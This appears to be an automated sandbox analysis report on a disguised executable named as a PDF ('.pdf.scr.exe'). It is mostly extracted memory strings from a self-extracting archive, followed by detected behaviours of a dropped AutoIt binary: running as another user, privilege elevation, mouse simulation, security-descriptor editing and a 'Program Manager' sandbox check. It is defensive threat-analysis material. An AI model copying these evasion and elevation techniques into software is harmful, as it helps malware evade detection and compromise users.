Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: %s#[k
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: "b <1=
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: #.x'=
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: #.x'=hbo
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ?tanh
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: atan2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: floor
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ldexp
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: _cabs
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: _hypot
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: frexp
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: _logb
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: _nextafter
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ?tanhatanatan2sincostanceilfloorfabsmodfldexp_cabs_hypotfmodfrexp_y0_y1_yn_logb_nextafter
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: sinhcosh
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: conout$
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `rsds
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: d:\projects\winrar\sfx\build\sfxrar32\release\sfxrar.pdb
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .text$di
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .text$mn
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .text$x
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .text$xp+
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .text$yd
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: l.text$yd0
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .idata$5
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .idata$5x2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .00cfg
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xca
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xcaa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xcu
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ,.crt$xcu
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xcz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xia
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xiaa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xiac
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xic
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xiz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xpa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xpx
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xpxa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xpz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xta
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xtz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .gfids
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rdata
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: {.rdata
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rdata$r
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rdata$sxdata
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rdata$voltmd
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: d.rdata$voltmd
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rdata$zzzdbg
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rtc$iaa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rtc$izz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rtc$taa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rtc$tzz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .xdata$x
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .didat$2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .didat$3
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .didat$3
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .didat$4
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .didat$6
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .didat$7
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .didat$7p
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .edata
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 4.edata
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .idata$2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: <.idata$2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .idata$3
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .idata$4
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .idata$4l
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .idata$6
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .data
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .data
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .data$r
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .data$rs
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .bss0
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .didat$5
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .didat$5@
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rsrc$01
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rsrc$01pf
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rsrc$02
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rsrc$02"
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: showwindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: showwindow'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getdlgitem
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: enablewindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setwindowtextw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setwindowtextwd
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getparent
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setwindowpos
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setdlgitemtextw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setdlgitemtextw~
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getsystemmetrics
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getclientrect
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getwindowrect
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getwindowlongw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setwindowlongw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setprocessdefaultlayout
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getwindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: loadstringw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: loadstringw"
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: oemtocharbuffa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: charupperw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: oemtocharbuffa<charupperw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: defwindowprocw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: defwindowprocwm
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: registerclassexw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: createwindowexw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: registerclassexwncreatewindowexw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: iswindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: destroywindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: updatewindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: updatewindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mapwindowpoints
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: copyrect
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mapwindowpointsucopyrect
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: loadcursorw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: loadcursorw\|
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: sendmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: sendmessagew!
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getdc
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getdce
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: releasedc
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: messageboxw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: findwindowexw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getclassnamew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: copyimage
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getclassnamewtcopyimage5
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: wvsprintfw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: wvsprintfw]
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: translatemessage
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: dispatchmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: dispatchmessagew3
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: peekmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: peekmessagew6
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: postmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: postmessagew&
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: waitforinputidle
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: iswindowvisible
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: dialogboxparamw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: enddialog
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: enddialog*
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getdlgitemtextw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getdlgitemtextws
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: senddlgitemmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setfocus
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setforegroundwindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setforegroundwindow{
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getsyscolor
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: loadbitmapw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: loadiconw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: destroyicon
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: isdialogmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: createcompatiblebitmap
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: createcompatibledc
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: isdialogmessagew/createcompatiblebitmap0createcompatibledc
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: deletedc
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: deleteobject
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getdevicecaps
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getdevicecapsw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: selectobject
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: stretchblt
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: createdibsection

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

2_2_00371A91

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_00313312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

2_2_00313312

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_0037EBB3 mouse_event,

2_2_0037EBB3

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_00371EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

2_2_00371EF3

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_003713F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

2_2_003713F2

Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007382000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000000.358747295.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.0000000003872000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerH
Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager&
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.586667731.00000000075DC000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: itugx.exe	Binary or memory string: Shell_TrayWnd
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager8W
Source: itugx.exe, 00000005.00000003.451315387.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452100532.0000000001510000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451193951.00000000014F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerm,
Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managera
Source: itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If WinGetText("Program Manager") = "0" Then
